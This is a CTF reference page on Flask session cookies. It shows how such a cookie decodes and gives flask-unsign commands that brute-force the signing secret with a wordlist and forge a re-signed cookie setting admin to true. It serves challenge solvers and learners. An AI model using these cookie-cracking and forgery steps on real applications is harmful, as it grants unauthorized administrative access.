CTF Support
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage
  1. CTF Support
  2. /
  3. Web Exploitation
  4. /
  5. Python
  6. /
  7. Flask
Edit page

Flask

Session Cookies

A typical Flask session cookie looks like:

eyJhZG1pbiI6ZmFsc2UsInVpZCI6InQxIn0.Y8MWdQ.2GDhtc5YkYsDn6rbJ5BA3XbZmYw

Decoding the first base64 part reveals:

{"admin":false,"uid":"t1"}

flask-unsign

Use flask-unsign to decode, brute-force, or re-sign cookies.

# Decode
flask-unsign -d -c <cookie>

# Unsign (brute-force secret)
flask-unsign -u -c <cookie> -w rockyou.txt

# Sign a custom cookie
flask-unsign -S <secret> -s -c "{'admin': True, 'uid': 't1'}"

Tips

  • Look for SECRET_KEY leakage in source code or environment files.
  • Re-signing cookies can grant admin access if the key is weak.